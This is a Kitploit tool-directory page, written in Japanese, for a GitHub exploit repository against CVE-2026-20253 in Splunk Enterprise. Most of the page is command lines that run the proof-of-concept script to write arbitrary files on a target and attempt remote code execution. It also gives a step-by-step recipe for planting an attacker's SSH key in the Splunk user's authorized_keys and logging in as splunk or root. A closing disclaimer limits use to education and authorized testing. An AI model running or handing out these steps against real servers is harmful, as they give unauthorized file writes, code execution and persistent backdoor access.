Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-20253 — CVE-2026-20253 - Splunk Enterprise | Kitploit
ツール/GitHubGitHub/horkimhab/cve-2026-20253
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationRemote Access Tool
GitHubhorkimhab/cve-2026-20253

CVE-2026-20253

CVE-2026-20253 - Splunk Enterprise

リポジトリを見る
2ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-20253 - Splunk Enterprise

⚡ 簡単な使い方

このプロジェクトは、以下のような安全かつ許可された環境でのみ使用してください:

  • ローカル仮想マシン
  • Dockerコンテナ
  • 隔離されたラボ環境
  • 許可されたペネトレーションテスト環境

セットアップ例:

root@kitploit:~
git clone https://github.com/HORKimhab/CVE-2026-20253
cd CVE-2026-20253

# Project use python follow below

# Create a virtual environment
python -m venv venv

# Activate the virtual environment

# macOS / Linux
source venv/bin/activate

# Windows (Git Bash / WSL)
source venv/Scripts/activate

# Install requirements
pip install -r requirements.txt

使用例:

root@kitploit:~
# Basic check
python3 cve-2026-20253.py -t http://target:8000 --check

# Write empty/truncated file
python3 cve-2026-20253.py -t http://target:8000 --write "/tmp/pwned"

# Write with content from file
python3 cve-2026-20253.py -t http://target:8000 --write "/tmp/shell.py" --content poc-content.txt

# Advanced (restore + content)
python3 cve-2026-20253.py -t http://target:8000 --write "/opt/splunk/etc/apps/.../payload.py" --content poc-content.txt --restore

# RCE attempt
python3 cve-2026-20253.py -t http://target:8000 --rce

python3 cve-2026-20253_poc.py -t http://target:8000 \
  --write "/path/to/target/file.py" \
  --content poc-content.txt --restore


# SSH 

# Generate SSH key pair (if you don't have one)
ssh-keygen -t ed25519 -C "poc@attacker" -f ~/.ssh/splunk_poc_key -N ""

# Or use RSA if target is older
# ssh-keygen -t rsa -b 4096 -f ~/.ssh/splunk_poc_key -N ""

cat ~/.ssh/splunk_poc_key.pub > poc-content.txt

python3 cve-2026-20253_poc.py -t http://target:8000 \
  --write "/home/splunk/.ssh/authorized_keys" \
  --content poc-content.txt \
  --restore

python3 cve-2026-20253_poc.py -t http://target:8000 \
  --write "/home/splunk/.ssh/authorized_keys" \
  --content poc-content.txt

# Make sure permissions are correct on your side
chmod 600 ~/.ssh/splunk_poc_key

# Connect
ssh -i ~/.ssh/splunk_poc_key splunk@target_ip

# Or as root
ssh -i ~/.ssh/splunk_poc_key root@target_ip


# Step 1: Create directory (may not always work)
python3 cve-2026-20253_poc.py -t http://target:8000 --write "/home/splunk/.ssh/.placeholder"

# Step 2: Write authorized_keys
python3 cve-2026-20253_poc.py -t http://target:8000 --write "/home/splunk/.ssh/authorized_keys" --content poc-content.txt

mkdir -p /home/splunk/.ssh
chmod 700 /home/splunk/.ssh
chmod 600 /home/splunk/.ssh/authorized_keys
chown -R splunk:splunk /home/splunk/.ssh

クレジットおよび参考リンク

  • https://thehackernews.com/2026/06/critical-splunk-enterprise-flaw-lets.html
  • watchTowr-vs-Splunk-CVE-2026-20253: https://github.com/watchtowrlabs/watchTowr-vs-Splunk-CVE-2026-20253
  • CVE-2026-20253-0xBlackash: https://github.com/0xBlackash/CVE-2026-20253

📚 教育用セキュリティ研究リポジトリ

管理された環境でサイバーセキュリティの概念を学習・テスト・研究するためのリポジトリです。


⚠️ セキュリティおよび法的免責事項

目的

このリポジトリは教育目的および許可されたセキュリティ研究のみを対象としています。

ユーザーが以下について学ぶために設計されています:

  • セキュリティの脆弱性
  • サンドボックスと隔離の概念
  • 安全なコーディングと防御的プラクティス

許可された使用のみ

このリポジトリは、以下のような許可を得た環境でのみ使用してください:

  • 個人のラボまたは仮想マシン
  • Dockerまたは隔離された環境
  • 許可されたペネトレーションテスト
  • サイバーセキュリティトレーニングまたは学術研究

無断使用や不正使用は固く禁止されています。


免責事項

作者および貢献者は、このプロジェクトによって引き起こされた損害、誤用、法的問題、または損失について一切責任を負いません。

このリポジトリを使用することで、以下に同意したものとみなされます:

  • 自己の行動に対する責任は自分自身にあること
  • 合法的かつ倫理的に使用すること
  • このプロジェクトは保証なしで提供されること

倫理的な使用

このプロジェクトは以下を目的としています:

  • 防御的なセキュリティ研究
  • サイバーセキュリティ教育
  • 脆弱性への意識向上
  • 安全なシステムおよびソフトウェアの研究

責任ある情報開示の慣行に従い、適用されるすべての法律を遵守してください。


連絡先

責任ある情報開示またはコラボレーションについては、GitHubを通じてリポジトリのメンテナーに連絡してください。

ツールをダウンロード